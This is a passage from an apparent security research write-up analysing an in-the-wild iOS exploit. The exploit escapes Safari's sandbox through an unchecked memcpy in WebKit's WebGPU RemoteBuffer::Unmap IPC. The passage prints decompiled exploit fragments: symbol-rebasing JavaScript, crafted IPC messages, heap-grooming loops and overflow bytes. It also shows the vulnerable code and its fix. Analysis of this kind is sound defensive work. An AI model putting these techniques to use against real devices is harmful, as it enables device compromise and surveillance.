costs.\n\n### Setting the stage\n\nAfter gaining native code execution exploiting a [JavaScriptCore Garbage Collection vulnerability](<https://github.com/WebKit/WebKit/commit/c9880de4a28b9a64a5e1d0513dc245d61a2e6ddb>) the attackers perform a find-and-replace on a large ArrayBuffer in JavaScript containing a Mach-O binary to link a number of platform- and version-dependent symbol addresses and structure offsets using hardcoded values:\n\n// find and rebase symbols for current target and ASLR slide:\n\ndt: {\n\nce: false,\n\n[\"16.3.0\"]: {\n\n_e: 0x1ddc50ed1,\n\nde: 0x1dd2d05b8,\n\nue: 0x19afa9760,\n\nhe: 1392,\n\nme: 48,\n\nfe: 136,\n\npe: 0x1dd448e70,\n\nge: 305,\n\nCe: 0x1dd2da340,\n\nPe: 0x1dd2da348,\n\nye: 0x1dd2d45f0,\n\nbe: 0x1da613438,\n\n...\n\n[\"16.3.1\"]: {\n\n_e: 0x1ddc50ed1,\n\nde: 0x1dd2d05b8,\n\nue: 0x19afa9760,\n\nhe: 1392,\n\nme: 48,\n\nfe: 136,\n\npe: 0x1dd448e70,\n\nge: 305,\n\nCe: 0x1dd2da340,\n\nPe: 0x1dd2da348,\n\nye: 0x1dd2d45f0,\n\nbe: 0x1da613438,\n\n// mach-o Uint32Array:\n\nxxxx = new Uint32Array([0x77a9d075,0x88442ab6,0x9442ab8,0x89442ab8,0x89442aab,0x89442fa2,\n\n// deobfuscate xxx\n\n...\n\n// find-and-replace symbols:\n\nxxxx.on(new m(\"0x2222222222222222\"), p.Le);\n\nxxxx.on(new m(\"0x3333333333333333\"), Gs);\n\nxxxx.on(new m(\"0x9999999999999999\"), Bs);\n\nxxxx.on(new m(\"0x8888888888888888\"), Rs);\n\nxxxx.on(new m(\"0xaaaaaaaaaaaaaaaa\"), Is);\n\nxxxx.on(new m(\"0xc1c1c1c1c1c1c1c1\"), vt);\n\nxxxx.on(new m(\"0xdddddddddddddddd\"), p.Xt);\n\nxxxx.on(new m(\"0xd1d1d1d1d1d1d1d1\"), p.Jt);\n\nxxxx.on(new m(\"0xd2d2d2d2d2d2d2d2\"), p.Ht);\n\nThe initial Mach-O which this loads has a fairly small __TEXT (code) segment and is itself in fact a Mach-O loader, which loads another binary from a segment called __embd. It's this inner Mach-O which this analysis will cover.\n\n### Part I - Mysterious Messages\n\nLooking through the strings in the binary there's a collection of familiar IOKit userclient matching strings referencing graphics drivers:\n\n\"AppleM2ScalerCSCDriver\",0\n\n\"IOSurfaceRoot\",0\n\n\"AGXAccelerator\",0 \n\nBut following the cross references to \"AGXAccelerator\" (which opens userclients for the GPU) this string never gets passed to IOServiceOpen. Instead, all references to it end up here (the binary is stripped so all function names are my own): \n\nkern_return_t\n\nget_a_user_client(char *matching_string,\n\nu32 type,\n\nvoid* s_out) {\n\nkern_return_t ret;\n\nstruct uc_reply_msg;\n\nmach_port_name_t reply_port;\n\nstruct msg_1 msg;\n\nreply_port = 0;\n\nmach_port_allocate(mach_task_self_,\n\nMACH_PORT_RIGHT_RECEIVE,\n\n&amp;reply_port);\n\nmemset(&amp;msg, 0, sizeof(msg));\n\nmsg.hdr.msgh_bits = 0x1413;\n\nmsg.hdr.msgh_remote_port = a_global_port;\n\nmsg.hdr.msgh_local_port = reply_port;\n\nmsg.hdr.msgh_id = 5;\n\nmsg.hdr.msgh_size = 200;\n\nmsg.field_a = 0;\n\nmsg.type = type;\n\n__strcpy_chk(msg.matching_str, matching_string, 128LL);\n\nret = mach_msg_send(&amp;msg.hdr);\n\n...\n\n// return a port read from the reply message via s_out\n\nWhilst it's not unusual for a userclient matching string to end up inside a mach message (plenty of exploits will include or generate their own [MIG serialization](<https://www.cs.cmu.edu/afs/cs/project/mach/public/doc/unpublished/mig.ps>) code for interacting with IOKit) this isn't a MIG message.\n\nTrying to track down the origin of the port right to which this message was sent was non-trivial; there was clearly more going on. My guess was that this must be communicating with something else, likely some other part of the exploit. The question was: what other part?\n\n### Down the rabbit hole\n\nAt this point I started going through all the cross-references to the imported symbols which could send or receive mach messages, hoping to find the other end of this IPC. This just raised more questions than it answered.\n\nIn particular, there were a lot of cross-references to a function sending a variable-sized mach message with a msgh_id of 0xDBA1DBA.\n\nThere is exactly one hit on Google for that constant:\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi77WGxhsnBXl8ShJPuffTWC4CVnq9-ehI4PbAqe2ZcWzccweFWaBEuxQUb03kryqpgeyfJnlI4Xh494eScUZTM1Yh6Cniss0U9z0Ycws1mfh8p1ML4dSjlMypbnqZyNSjQx654p2oeax6341PjKbN07GO7-b31hU9Lx26PF2U153TFehRyGVF68ohby4I/s1600/image17.png>)\n\nIgnoring Google's helpful advice that maybe I wanted to search for \"cake recipes\" instead of this hex constant and following the single result leads to this snippet on [opensource.apple.com](<https://opensource.apple.com/source/WebKit2/WebKit2-7609.3.5.1.3/Platform/IPC/cocoa/ConnectionCocoa.mm.auto.html>) in ConnectionCocoa.mm:\n\nnamespace IPC {\n\nstatic const size_t inlineMessageMaxSize = 4096;\n\n// Arbitrary message IDs that do not collide with Mach notification messages (used my initials).\n\nconstexpr mach_msg_id_t inlineBodyMessageID = 0xdba0dba;\n\nconstexpr mach_msg_id_t outOfLineBodyMessageID = 0xdba1dba;\n\nThis is a constant used in Safari IPC messages!\n\nWhilst Safari has had a separate networking process for a long time it's only recently started to isolate GPU and graphics-related functionality into a GPU process. Knowing this, it's fairly clear what must be going on here: since the renderer process can presumably no longer open the AGXAccelerator userclients, the exploit is somehow going to have to get the GPU process to do that. This is likely the first case of an in-the-wild iOS exploit targeting Safari's IPC layer.\n\n### The path less trodden\n\nGoogling for info on Safari IPC doesn't yield many results (apart from some very early [Project Zero vulnerability reports](<https://bugs.chromium.org/p/project-zero/issues/detail?id=10&q=&can=1>)) and looking through the WebKit source reveals heavy use of [generated code](<https://github.com/WebKit/WebKit/blob/main/Source/WebKit/Scripts/generate-serializers.py>) and [C++ operator overloading](<https://github.com/WebKit/WebKit/blob/main/Source/WebKit/Scripts/generate-serializers.py#L426>), neither of which are conducive to quickly getting a feel for the binary-level structure of the IPC messages.\n\nBut the high-level structure is easy enough to figure out. As we can see from the code snippet above, IPC messages containing the msgh_id value 0xdba1dba send their serialized message body as an out-of-line descriptor. That serialized body always starts with a common header defined in the IPC namespace as:\n\nvoid Encoder::encodeHeader()\n\n{\n\n*this &lt;&lt; defaultMessageFlags;\n\n*this &lt;&lt; m_messageName;\n\n*this &lt;&lt; m_destinationID;\n\n}\n\nThe flags and name fields are both 16-bit values and destinationID is 64 bits. The serialization uses natural alignment so there's 4 bytes of padding between the name and destinationID:\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPHyHj04YHCntV4a-CazqQl6hyZ7SK4dKseLE4jowixuOV-a_Deq2tOnpipp3GtmvkPwaih64ZYbjX-V1wcAkHqlIb0WhV0Nb2yMlkHfj2gzkx1vloU85dt2fliFnMuh_v0M_Oup9udzhBM5_bPDsLPLHx749BVcpDHxvN8mNLfD0nRUiHyKDJ7sceVsA/s840/image15.png>)\n\nIt's easy enough to enumerate all the functions in the exploit which serialize these Safari IPC messages. None of them hardcode the messageName values; instead there's a layer of indirection indicating that the messageName values aren't stable across builds. The exploit uses the device's [uname](<https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/uname.3.html>) string, product and OS version to choose the correct hardcoded table of messageName values.\n\nThe IPC::description function in the iOS shared cache maps messageName values to IPC names:\n\nconst char * IPC::description(unsigned int messageName)\n\n{\n\nif ( messageName &gt; 0xC78 )\n\nreturn \"&lt;invalid message name&gt;\";\n\nelse\n\nreturn off_1D61ED988[messageName];\n\n}\n\nThe size of the bounds check gives you an idea of the size of the IPC attack surface - that's over 3000 IPC messages between all pairs of communicating processes.\n\nUsing the table in the shared cache to map the message names to human-readable strings we can see the exploit uses the following 24 IPC messages:\n\n0x39: GPUConnectionToWebProcess_CreateRemoteGPU\n\n0x3a: GPUConnectionToWebProcess_CreateRenderingBackend\n\n0x9B5: InitializeConnection\n\n0x9B7: ProcessOutOfStreamMessage\n\n0xBA2: RemoteAdapter_RequestDevice\n\n0xBA5: RemoteBuffer_MapAsync\n\n0x271: RemoteBuffer_Unmap\n\n0xBA6: RemoteCDMFactoryProxy_CreateCDM\n\n0x2A2: RemoteDevice_CreateBuffer\n\n0x2C7: RemoteDisplayListRecorder_DrawNativeImage\n\n0x2D4: RemoteDisplayListRecorder_FillRect\n\n0x2DF: RemoteDisplayListRecorder_SetCTM\n\n0x2F3: RemoteGPUProxy_WasCreated\n\n0xBAD: RemoteGPU_RequestAdapter\n\n0x402: RemoteMediaRecorderManager_CreateRecorder\n\n0xA85: RemoteMediaRecorderManager_CreateRecorderReply\n\n0x412: RemoteMediaResourceManager_RedirectReceived\n\n0x469: RemoteRenderingBackendProxy_DidInitialize\n\n0x46D: RemoteRenderingBackend_CacheNativeImage\n\n0x46E: RemoteRenderingBackend_CreateImageBuffer\n\n0x474: RemoteRenderingBackend_ReleaseResource\n\n0x9B8: SetStreamDestinationID\n\n0x9B9: SyncMessageReply\n\n0x9BA: Terminate\n\nThis list of IPC names solidifies the theory that this exploit is targeting a GPU process vulnerability.\n\n### Finding a way\n\nThe destination port which these messages are being sent to comes from a global variable which looks like this in the raw Mach-O when loaded into IDA:\n\n__data:000000003E4841C0 dst_port DCQ 0x4444444444444444\n\nI mentioned earlier that the outer JS which loaded the exploit binary first performed a find-and-replace using patterns like this. Here's the snippet computing this particular value:\n\nlet Ls = o(p.Ee);\n\nlet Ds = o(Ls.add(p.qe));\n\nlet Ws = o(Ds.add(p.$e));\n\nlet vs = o(Ws.add(p.Ze));\n\njBHk.on(new m(\"0x4444444444444444\"), vs);\n\nReplacing all the constants we can see it's following a pointer chain from a hardcoded offset inside the shared cache:\n\nlet Ls = o(0x1dd453458);\n\nlet Ds = o(Ls.add(256));\n\nlet Ws = o(Ds.add(24);\n\nlet vs = o(Ws.add(280));\n\nAt the initial symbol address (0x1dd453458) we find the WebContent process's singleton process object which maintains its state:\n\nWebKit:__common:00000001DD453458 WebKit::WebProcess::singleton(void)::process\n\nFollowing the offsets we can see they follow this pointer chain to be able to find the mach port right representing the WebProcess's connection to the GPU process:\n\nprocess-&gt;m_gpuProcessConnection-&gt;m_connection-&gt;m_sendPort\n\nThe exploit also reads the m_receivePort field allowing it to set up bidirectional communication with the GPU process and fully imitate the WebContent process.\n\n### Defining features\n\nWebkit defines its IPC messages using a simple custom [DSL](<https://en.wikipedia.org/wiki/Domain-specific_language>) in files ending with the suffix .messages.in. These definitions [look like this](<https://github.com/WebKit/WebKit/blob/main/Source/WebKit/GPUProcess/graphics/WebGPU/RemoteRenderPipeline.messages.in>):\n\nmessages -&gt; RemoteRenderPipeline NotRefCounted Stream {\n\nvoid GetBindGroupLayout(uint32_t index, WebKit::WebGPUIdentifier identifier);\n\nvoid SetLabel(String label)\n\n}\n\nThese are parsed by [this python script](<https://github.com/WebKit/WebKit/blob/main/Source/WebKit/Scripts/webkit/parser.py>) to generate the necessary boilerplate code to handle serializing and deserializing the messages. Types which wish to cross the serialization boundary define ::encode and ::decode methods:\n\nvoid encode(IPC::Encoder&amp;) const;\n\nstatic WARN_UNUSED_RETURN bool decode(IPC::Decoder&amp;, T&amp;);\n\nThere are a number of macros defining these coders for the built-in types.\n\n### A pattern appears\n\nRenaming the methods in the exploit which send IPC messages and reversing some more of their arguments a clear pattern emerges:\n\nimage_buffer_base_id = rand();\n\nfor (i = 0; i &lt; 34; i++) {\n\nIPC_RemoteRenderingBackend_CreateImageBuffer(\n\nimage_buffer_base_id + i);\n\n}\n\nsemaphore_signal(semaphore_b);\n\nremote_device_buffer_id_base = rand();\n\nIPC_RemoteRenderingBackend_ReleaseResource(\n\nimage_buffer_base_id + 2);\n\nusleep(4000u);\n\nIPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base);\n\nusleep(4000u);\n\nIPC_RemoteRenderingBackend_ReleaseResource(\n\nimage_buffer_base_id + 4);\n\nusleep(4000u);\n\nIPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 1);\n\nusleep(4000u);\n\nIPC_RemoteRenderingBackend_ReleaseResource(\n\nimage_buffer_base_id + 6);\n\nusleep(4000u);\n\nIPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 2);\n\nusleep(4000u);\n\nIPC_RemoteRenderingBackend_ReleaseResource(\n\nimage_buffer_base_id + 8);\n\nusleep(4000u);\n\nIPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 3);\n\nusleep(4000u);\n\nIPC_RemoteRenderingBackend_ReleaseResource(\n\nimage_buffer_base_id + 10);\n\nusleep(4000u);\n\nIPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 4);\n\nusleep(4000u);\n\nIPC_RemoteRenderingBackend_ReleaseResource(\n\nimage_buffer_base_id + 12);\n\nusleep(4000u);\n\nIPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 5);\n\nusleep(4000u);\n\nsemaphore_signal(semaphore_b);\n\nThis creates 34 RemoteRenderingBackend ImageBuffer objects then releases 6 of them and likely reallocates the holes via the RemoteDevice::CreateBuffer IPC (passing a size of 16k.)\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMvJqqmG2DCLJpYJNfKRae4HmTO7gzV50CfUhun8NsLoIDZyaQiinJZWqaqsSLXmWEbh3ZR0un4E5dHo28oA0Ty2yuV9itnV4YScCgS8hmqlYx6XHX8orrZf9dtvSw5DxDB-g0fDxJHClZRkP8-CXxi_7ShGdClRlocHGX_mb6Tk9LPJdeyCBA8ktEjBA/s342/image18.png>)\n\nThis looks a lot like heap manipulation to place certain objects next to each other in preparation for a buffer overflow. The part which is slightly odd is how simple it seems - there's no evidence of a complex heap-grooming approach here. The diagram above was just my guess at what was probably happening, and reading through the code implementing the IPCs it was not at all obvious where these buffers were actually being allocated.\n\n### A strange argument\n\nI started to reverse engineer the structure of the IPC messages which looked most relevant, looking for anything which seemed out of place. One pair of messages seemed especially suspicious:\n\nRemoteBuffer::MapAsync\n\nRemoteBuffer::Unmap\n\nThese are two messages sent from the Web process to the GPU process, defined in GPUProcess/graphics/WebGPU/RemoteBuffer.messages.in and used in the [WebGPU](<https://en.wikipedia.org/wiki/WebGPU>) implementation.\n\nWhilst the IPC machinery implementing WebGPU exists in Safari, the user-facing javascript API isn't present. It used to be available in [Safari Technology Preview](<https://developer.apple.com/safari/technology-preview/>) builds available from Apple but it hasn't been enabled there for some time. The W3C WebGPU group's github wiki suggests that when enabling WebGPU support in Safari users should \"[avoid leaving it enabled when browsing the untrusted web](<https://github.com/gpuweb/gpuweb/wiki/Implementation-Status#safari-in-progress>).\"\n\nThe IPC definitions for the RemoteBuffer look like this:\n\nmessages -&gt; RemoteBuffer NotRefCounted Stream\n\n{\n\nvoid MapAsync(PAL::WebGPU::MapModeFlags mapModeFlags,\n\nPAL::WebGPU::Size64 offset, \n\nstd::optional&lt;PAL::WebGPU::Size64&gt; size)\n\n-&gt;\n\n(std::optional&lt;Vector&lt;uint8_t&gt;&gt; data) Synchronous\n\nvoid Unmap(Vector&lt;uint8_t&gt; data)\n\n}\n\nThese [WebGPU](<https://gpuweb.github.io/gpuweb/explainer/>) [resources](<https://github.com/gpuweb/gpuweb/issues/138>) explain the concepts behind these APIs. They're intended to manage sharing buffers between the GPU and CPU:\n\nMapAsync moves ownership of a buffer from the GPU to the CPU to allow the CPU to manipulate it without racing the GPU.\n\nUnmap then signals that the CPU is done with the buffer and ownership can return to the GPU.\n\nIn practice the MapAsync IPC returns a copy of the current contents of the WebGPU buffer (at the specified offset) to the CPU as a Vector&lt;uint8_t&gt;. Unmap then passes the new contents back to the GPU, also as a Vector&lt;uint8_t&gt;.\n\nYou might be able to see where this is going...\n\n### Buffer lifecycles\n\nRemoteBuffers are created on the WebContent side using the RemoteDevice::CreateBuffer IPC:\n\nmessages -&gt; RemoteDevice NotRefCounted Stream {\n\nvoid Destroy()\n\nvoid CreateBuffer(WebKit::WebGPU::BufferDescriptor descriptor, \n\nWebKit::WebGPUIdentifier identifier)\n\nThis takes a description of the buffer to create and an identifier to name it. All the calls to this IPC in the exploit used a fixed size of 0x4000 which is 16KB, the size of a single physical page on iOS.\n\nThe first sign that these IPCs were important was the rather strange arguments passed to MapAsync in some places:\n\nIPC_RemoteBuffer_MapAsync(remote_device_buffer_id_base + m,\n\n0x4000,\n\n0);\n\nAs shown above, this IPC takes a buffer id, an offset and a size to map - in that order. So this IPC call is requesting a mapping of the buffer with id remote_device_buffer_id_base + m at offset 0x4000 (the very end) of size 0 (ie nothing.)\n\nDirectly after this they call IPC_RemoteBuffer_Unmap passing a vector of 40 bytes as the \"new content\":\n\nb[0] = 0x7F6F3229LL;\n\nb[1] = 0LL;\n\nb[2] = 0LL;\n\nb[3] = 0xFFFFLL;\n\nb[4] = arg_val;\n\nreturn IPC_RemoteBuffer_Unmap(dst, b, 40LL);\n\n### Buffer origins\n\nI spent a considerable time trying to figure out the origin of the underlying pages backing the RemoteBuffer buffer allocations. Statically following the code from Webkit you eventually end up in the userspace-side of the AGX GPU family drivers, which are written in Objective-C. There are plenty of methods with names like \n\nid __cdecl -[AGXG15FamilyDevice newBufferWithLength:options:]\n\nimplying responsibility for buffer allocations - but there's no malloc, mmap or vm_allocate in sight.\n\nUsing dtrace to dump userspace and kernel stack traces while experimenting with code using the GPU on an M1 macbook, I eventually figured out that this buffer is allocated by the GPU driver itself, which then maps that memory into userspace:\n\nIOMemoryDescriptor::createMappingInTask\n\nIOBufferMemoryDescriptor::initWithPhysicalMask\n\ncom.apple.AGXG13X`AGXAccelerator::\n\ncreateBufferMemoryDescriptorInTaskWithOptions\n\ncom.apple.iokit.IOGPUFamily`IOGPUSysMemory::withOptions\n\ncom.apple.iokit.IOGPUFamily`IOGPUResource::newResourceWithOptions\n\ncom.apple.iokit.IOGPUFamily`IOGPUDevice::new_resource\n\ncom.apple.iokit.IOGPUFamily`IOGPUDeviceUserClient::s_new_resource\n\nkernel.release.t6000`0xfffffe00263116cc+0x80\n\nkernel.release.t6000`0xfffffe00263117bc+0x28c\n\nkernel.release.t6000`0xfffffe0025d326d0+0x184\n\nkernel.release.t6000`0xfffffe0025c3856c+0x384\n\nkernel.release.t6000`0xfffffe0025c0e274+0x2c0\n\nkernel.release.t6000`0xfffffe0025c25a64+0x1a4\n\nkernel.release.t6000`0xfffffe0025c25e80+0x200\n\nkernel.release.t6000`0xfffffe0025d584a0+0x184\n\nkernel.release.t6000`0xfffffe0025d62e08+0x5b8\n\nkernel.release.t6000`0xfffffe0025be37d0+0x28\n\n^\n\n\\--- kernel stack | | userspace stack ---\n\nv\n\nlibsystem_kernel.dylib`mach_msg2_trap\n\nIOKit`io_connect_method\n\nIOKit`IOConnectCallMethod\n\nIOGPU`IOGPUResourceCreate\n\nIOGPU`-[IOGPUMetalResource initWithDevice:\n\nremoteStorageResource:\n\noptions:\n\nargs:\n\nargsSize:]\n\nIOGPU`-[IOGPUMetalBuffer initWithDevice:\n\npointer:\n\nlength:\n\nalignment:\n\noptions:\n\nsysMemSize:\n\ngpuAddress:\n\nargs:\n\nargsSize:\n\ndeallocator:]\n\nAGXMetalG13X`-[AGXBuffer(Internal) initWithDevice:\n\nlength:\n\nalignment:\n\noptions:\n\nisSuballocDisabled:\n\nresourceInArgs:\n\npinnedGPULocation:]\n\nAGXMetalG13X`-[AGXBuffer initWithDevice:\n\nlength:\n\nalignment:\n\noptions:\n\nisSuballocDisabled:\n\npinnedGPULocation:]\n\nAGXMetalG13X`-[AGXG13XFamilyDevice newBufferWithDescriptor:]\n\nIOGPU`IOGPUMetalSuballocatorAllocate\n\nThe algorithm which IOMemoryDescriptor::createMappingInTask will use to find space in the task virtual memory is identical to that used by vm_allocate, which starts to explain why the \"heap groom\" seen earlier is so simple, as vm_allocate uses a simple bottom-up first fit algorithm.\n\n### mapAsync\n\nWith the origin of the buffer figured out we can trace the GPU process side of the mapAsync IPC. Through various layers of indirection we eventually reach the following code with controlled offset and size values:\n\nvoid* Buffer::getMappedRange(size_t offset, size_t size)\n\n{\n\n// https://gpuweb.github.io/gpuweb/#dom-gpubuffer-getmappedrange\n\nauto rangeSize = size;\n\nif (size == WGPU_WHOLE_MAP_SIZE)\n\nrangeSize = computeRangeSize(m_size, offset);\n\nif (!validateGetMappedRange(offset, rangeSize)) {\n\n// FIXME: \"throw an OperationError and stop.\"\n\nreturn nullptr;\n\n}\n\nm_mappedRanges.add({ offset, offset + rangeSize });\n\nm_mappedRanges.compact();\n\nreturn static_cast&lt;char*&gt;(m_buffer.contents) + offset;\n\n}\n\nm_buffer.contents is the base of the buffer which the GPU kernel driver mapped into the GPU process address space via AGXAccelerator::createBufferMemoryDescriptorInTaskWithOptions. This code stores the requested mapping range in m_mappedRanges then returns a raw pointer into the underlying page. Higher up the callstack that raw pointer and length is stored into the m_mappedRange field. The higher level code then makes a copy of the contents of the buffer at that offset, wrapping that copy in a Vector&lt;&gt; to send back over IPC.\n\n### unmap\n\nHere's the implementation of the RemoteBuffer_Unmap IPC on the GPU process side. At this point data is a Vector&lt;&gt; sent by the WebContent client.\n\nvoid RemoteBuffer::unmap(Vector&lt;uint8_t&gt;&amp;&amp; data)\n\n{\n\nif (!m_mappedRange)\n\nreturn;\n\nASSERT(m_isMapped);\n\nif (m_mapModeFlags.contains(PAL::WebGPU::MapMode::Write))\n\nmemcpy(m_mappedRange-&gt;source, data.data(), data.size());\n\nm_isMapped = false;\n\nm_mappedRange = std::nullopt;\n\nm_mapModeFlags = { };\n\n}\n\nThe issue is a sadly trivial one: whilst the RemoteBuffer code does check that the client has previously mapped this buffer object - and thus m_mappedRange contains the offset and size of that mapped range - it fails to verify that the size of the Vector&lt;&gt; of \"modified contents\" actually matches the size of the previous mapped range. Instead the code simply blindly memcpy's the client-supplied Vector&lt;&gt; into the mapped range using the Vector&lt;&gt;'s size rather than the range's.\n\nThis unchecked memcpy using values directly from an IPC is the in-the-wild sandbox escape vulnerability.\n\n[Here's the fix](<https://github.com/WebKit/WebKit/commit/54408f5746f2401721bd56d71de132a22b6f9856>):\n\nvoid RemoteBuffer::unmap(Vector&lt;uint8_t&gt;&amp;&amp; data)\n\n{\n\n\\- if (!m_mappedRange)\n\n\\+ if (!m_mappedRange || m_mappedRange-&gt;byteLength &lt; data.size())\n\nreturn;\n\nASSERT(m_isMapped);\n\nIt should be noted that [security issues with WebGPU are well-known](<https://chromium.googlesource.com/chromium/src/+/main/docs/security/research/graphics/webgpu_technical_report.md>) and the javascript interface to WebGPU is disabled in Safari on iOS. But the IPC's which support that javascript interface were not disabled, meaning that WebGPU still presented a rich sandbox-escape attack surface. This seems like a significant oversight.\n\n### Destination unknown?\n\nFinding the allocation site for the GPU buffer wasn't trivial; the allocation site for the buffer was hard to determine statically, which made it hard to get a picture of what objects were being groomed. Figuring out the overflow target and its allocation site was similarly tricky.\n\nStatically following the implementation of the RemoteRenderingBackend::CreateImageBuffer IPC, which, based on the high-level flow of the exploit, appeared like it must be responsible for allocating the overflow target again quickly ended up in system library code with no obvious targets.\n\nWorking with the theory that because of the simplicity of the heap groom it was likely that vm_allocate/mmap was somehow responsible for the allocations I set breakpoints on those APIs on an M1 mac in the Safari GPU process and ran the WebGL conformance tests. There was only a single place where mmap was called:\n\nTarget 0: (com.apple.WebKit.GPU) stopped.\n\n(lldb) bt\n\n* thread #30, name = 'RemoteRenderingBackend work queue',\n\nstop reason = breakpoint 12.1\n\n* frame #0: mmap\n\nframe #1: QuartzCore`CA::CG::Queue::allocate_slab\n\nframe #2: QuartzCore`CA::CG::Queue::alloc\n\nframe #3: QuartzCore`CA::CG::ContextDelegate::fill_rects\n\nframe #4: QuartzCore`CA::CG::ContextDelegate::draw_rects_\n\nframe #5: CoreGraphics`CGContextFillRects\n\nframe #6: CoreGraphics`CGContextFillRect\n\nframe #7: CoreGraphics`CGContextClearRect\n\nframe #8: WebKit::ImageBufferShareableMappedIOSurfaceBackend::create\n\nframe #9: WebKit::RemoteRenderingBackend::createImageBuffer\n\nThis corresponds perfectly with the IPC we see called in the heap groom above!\n\n### To the core...\n\nQuartzCore is part of the low-level drawing/rendering code on iOS. Reversing the code around the mmap site it seems to be a custom queue type used for drawing commands. Dumping the mmap'ed QueueSlab memory a little later on we see some structure:\n\n(lldb) x/10xg $x0\n\n0x13574c000: 0x00000001420041d0 0x0000000000000000\n\n0x13574c010: 0x0000000000004000 0x0000000000003f10\n\n0x13574c020: 0x000000013574c0f0 0x0000000000000000\n\nReversing some of the surrounding QuartzCore code we can figure out that the header has a structure something like this:\n\nstruct QuartzQueueSlab\n\n{\n\nstruct QuartzQueueSlab *free_list_ptr;\n\nuint64_t size_a;\n\nuint64_t mmap_size;\n\nuint64_t remaining_size;\n\nuint64_t buffer_ptr;\n\nuint64_t f;\n\nuint8_t inline_buffer[16336];\n\n};\n\nIt's a short header with a free-list pointer, some sizes then a pointer into an inline buffer. The fields are initialized like this:\n\nmapped_base-&gt;free_list_ptr = 0;\n\nmapped_base-&gt;size_a = 0;\n\nmapped_base-&gt;mmap_size = mmap_size;\n\nmapped_base-&gt;remaining_size = mmap_size - 0x30;\n\nmapped_base-&gt;buffer_ptr = mapped_base-&gt;inline_buffer;\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIqwtuc-0ZTnOb6WGHuqEg5P-gZ3Bf1fqfku2h66HxqhyphenhyphenJmhWFCFMwUTu2ohIfkpvNaj1ocPCESnt_HTMgMaxLzZbLey_tsxIrL8nRJrIa3EGvvOd85kwTppcuFay53pvegAUQ9InLI4D-QHKr9iazM-9MZMdz5gcS7_-AYjnX6bL5wWAzZoS6QnvipnI/s402/image4.png>)\n\nThe QueueSlab is a simple allocator. end starts off pointing to the start of the inline buffer; getting bumped up each allocation as long as remaining indicates there's still space available:\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjov058qoKcaKJw4Uoeq3WxRsoHyKokXVcHkKGabincvB7SKbtRgEJUKcF_jRyORK3M6aKH4EHHOnnTLVo4SS9VKvRIct1t5ZzVBp2D6Pvtz6LrBmFic5aQmKW0XTylkd9k_M7RqzIAXEN146E2taGVgf00lTbcK-iez0LB6_Sma02AhnVSpN3ORaP3ZU0/s401/image1.png>)\n\nAssuming that this very likely is the corruption target; the bytes which the call to RemoteBuffer::Unmap would corrupt this header with line up like this:\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg36uw0ZWS_Oufz6ILmIJGcbvm_gWPLVB7RDlaMLKAk0BDUDBAaka1uNs-cnhLBErOguET_SAsBprti8NkDcwvx42X6ujBuyegyMd9y3oezr7U1S5e2YZyXfCOPd0zbGjlt1EfJvV7etxNLb25g357NdxWWPJ7Aay6XPm39JiT9HdXieHUVVs3eZ8u44yk/s506/image13.png>)\n\nb[0] = 0x7F6F3229LL;\n\nb[1] = 0LL;\n\nb[2] = 0LL;\n\nb[3] = 0xFFFFLL;\n\nb[4] = arg;\n\nreturn IPC_RemoteBuffer_Unmap(dst, b, 40LL);\n\nThe exploit's wrapper around the RemoteBuffer::Unmap IPC takes a single argument, which would like up perfectly with the inline-buffer pointer of the QueueSlab, replacing it with an arbitrary value.\n\nThe queue slab is pointed to by a higher-level CA::CG::Queue object, which in turn is pointed to by a CGContext object.\n\n### Groom 2\n\nBefore triggering the Unmap overflow there's another groom:\n\nremote_device_after_base_id = rand();\n\nfor (j = 0; j &lt; 200; j++) {\n\nIPC_RemoteDevice_CreateBuffer_16k(\n\nremote_device_after_base_id + j);\n\n}\n\nsemaphore_signal(semaphore_b);\n\nsemaphore_signal(semaphore_a);\n\nIPC_RemoteRenderingBackend_CacheNativeImage(\n\nimage_buffer_base_id + 34LL);\n\nsemaphore_signal(semaphore_b);\n\nsemaphore_signal(semaphore_a);\n\nfor (k = 0; k &lt; 200; k++) {\n\nIPC_RemoteDevice_CreateBuffer_16k(\n\nremote_device_after_base_id + 200 + k);\n\n}\n\nThis is clearly trying to place an allocation related to RemoteRenderingBackend::CacheNativeImage near a large number of allocations related to RemoteDevice::CreateBuffer which is the IPC we saw earlier which causes the allocation of RemoteBuffer objects. The purpose of this groom will become clear later.\n\n### Overflow 1\n\nThe core primitive for the first overflow involves 4 IPC methods:\n\n 1. RemoteBuffer::MapAsync \\- sets up the destination pointer for the overflow\n 2. RemoteBufferUnmap \\- performs the overflow, corrupting queue metadata\n 3. RemoteDisplayListRecorder::DrawNativeImage \\- uses the corrupted queue metadata to write a pointer to a controlled address\n 4. RemoteCDMFactoryProxy::CreateCDM \\- discloses the written pointer pointer value\n\nWe'll look at each of those in turn:\n\n### IPC 1 - MapAsync\n\nfor (m = 0; m &lt; 6; m++) {\n\nindex_of_corruptor = m;\n\nIPC_RemoteBuffer_MapAsync(remote_device_buffer_id_base + m,\n\n0x4000LL,\n\n0LL);\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPHqd83zzk0t69Zv406G_p93zAOAmrUtAz6-g6wnQfT1rQ_eViIYveasECdYVTO1MrK_wHcGaiYltNbX7Htfc9TJpsa45Q5y2mXse_cse34fl4fQJdbopVhLSwKE_XlPDWa2FfsVhPr5VTkrnwV2uBOvZ_YyfDmRiz8mb13ejtW-mHQcmkcSrwwkvZwY8/s581/image14.png>)\n\nThey iterate through all 6 of the RemoteBuffer objects in the hope that the groom successfully placed at least one of them directly before a QueueSlab allocation. This MapAsync IPC sets the RemoteBuffer's m_mappedRange-&gt;source field to point at the very end (hopefully at a QueueSlab.)\n\n### IPC 2 - Unmap\n\nwrap_remote_buffer_unmap(remote_device_buffer_id_base + 